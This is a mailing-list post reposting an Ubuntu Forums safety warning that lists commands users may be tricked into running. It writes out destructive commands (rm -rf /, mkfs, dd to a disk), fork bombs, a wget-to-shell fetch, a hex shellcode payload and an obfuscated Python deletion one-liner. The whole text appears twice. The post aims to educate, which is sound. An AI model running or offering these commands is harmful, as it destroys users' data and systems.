[FSUG-CEAL] dangerous codes
2 views
Skip to first unread message
spec2
May 5, 2010, 6:53:46 AM5/5/10
to FSUG-CEAL
courtesy:ubuntu forums
DANGEROUS COMMANDS -- look but DO NOT RUN.
Also, this is far from an exhaustive list, but should give you some
clues as to what kind of things people may try to trick you into
doing. Remember this can always be disguised in an obfuscated command
or as a part of a long procedure, so the bottom line is take caution
for yourself when something just doesn't "feel right".
Delete all files, delete current directory, and delete visible files
in current directory. It's quite obvious why these commands can be
dangerous to execute.
Code:
rm -rf /
rm -rf .
rm -rf *
The only problem is that .., the link to the previous directory, will
be matched by this and this will in turn delete everything above this
directory level (oops!). A possible alternative that I can think of
for this would be
Code:
rm -r .[^.]*
which will exclude the entry "..". Of course, it probably has
limitations of not matching certain entries, fixing which is an
exercise left to the reader.
Reformat: Data on device mentioned after the mkfs command will be
destroyed and replaced with a blank filesystem.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block
device. Often times this will clobber the filesystem and cause total
loss of data:
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes,
forcing you to do a hard reset which may cause corruption, data
damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing
and curiousity provokes)
Code:
:(){:|:&};:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing
directory. This tar archive can be crafted to explode into a million
files, or inject files into the system by guessing filenames. You
should make the habit of decompressing tars inside a cleanly made
directory
Decompression bomb: Someone asks you to extract an archive which
appears to be a small download. In reality it's highly compressed data
and will inflate to hundreds of GB's, filling your hard drive. You
should not touch data from an untrusted source
Shellscript: Someone gives you the link to a shellscript to execute.
This can contain any command he chooses -- benign or malevolent. Do
not execute code from people you don't trust
Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to
compile it. It is easy to hide malicious code as a part of a large wad
of source code, and source code gives the attacker a lot more
creativity for disguising malicious payloads. Do not compile OR
execute the compiled code unless the source is of some well-known
application, obtained from a reputable site (i.e. SourceForge, the
author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a
proof of concept sudo exploit claiming that if you run it, sudo grants
you root without a shell. In it was this payload:
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like
the "hex code gibberish stuff" that is so typical of a safe proof-of-
concept. However, this actually runs rm -rf ~ / & which will destroy
your home directory as a regular user, or all files as root. If you
could see this command in the hex string, then you don't need to be
reading this announcement. Otherwise, remember that these things can
come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not
use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in
"sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course
this is a silly example -- I wouldn't expect anyone to be foolish
enough to paste this monstrous thing into their terminal without
suspecting something might be wrong.
DANGEROUS COMMANDS -- look but DO NOT RUN.
Also, this is far from an exhaustive list, but should give you some
clues as to what kind of things people may try to trick you into
doing. Remember this can always be disguised in an obfuscated command
or as a part of a long procedure, so the bottom line is take caution
for yourself when something just doesn't "feel right".
Delete all files, delete current directory, and delete visible files
in current directory. It's quite obvious why these commands can be
dangerous to execute.
Code:
rm -rf /
rm -rf .
rm -rf *
The only problem is that .., the link to the previous directory, will
be matched by this and this will in turn delete everything above this
directory level (oops!). A possible alternative that I can think of
for this would be
Code:
rm -r .[^.]*
which will exclude the entry "..". Of course, it probably has
limitations of not matching certain entries, fixing which is an
exercise left to the reader.
Reformat: Data on device mentioned after the mkfs command will be
destroyed and replaced with a blank filesystem.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block
device. Often times this will clobber the filesystem and cause total
loss of data:
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes,
forcing you to do a hard reset which may cause corruption, data
damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing
and curiousity provokes)
Code:
:(){:|:&};:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing
directory. This tar archive can be crafted to explode into a million
files, or inject files into the system by guessing filenames. You
should make the habit of decompressing tars inside a cleanly made
directory
Decompression bomb: Someone asks you to extract an archive which
appears to be a small download. In reality it's highly compressed data
and will inflate to hundreds of GB's, filling your hard drive. You
should not touch data from an untrusted source
Shellscript: Someone gives you the link to a shellscript to execute.
This can contain any command he chooses -- benign or malevolent. Do
not execute code from people you don't trust
Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to
compile it. It is easy to hide malicious code as a part of a large wad
of source code, and source code gives the attacker a lot more
creativity for disguising malicious payloads. Do not compile OR
execute the compiled code unless the source is of some well-known
application, obtained from a reputable site (i.e. SourceForge, the
author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a
proof of concept sudo exploit claiming that if you run it, sudo grants
you root without a shell. In it was this payload:
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like
the "hex code gibberish stuff" that is so typical of a safe proof-of-
concept. However, this actually runs rm -rf ~ / & which will destroy
your home directory as a regular user, or all files as root. If you
could see this command in the hex string, then you don't need to be
reading this announcement. Otherwise, remember that these things can
come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not
use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in
"sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course
this is a silly example -- I wouldn't expect anyone to be foolish
enough to paste this monstrous thing into their terminal without
suspecting something might be wrong.
Reply all
Reply to author
Forward
0 new messages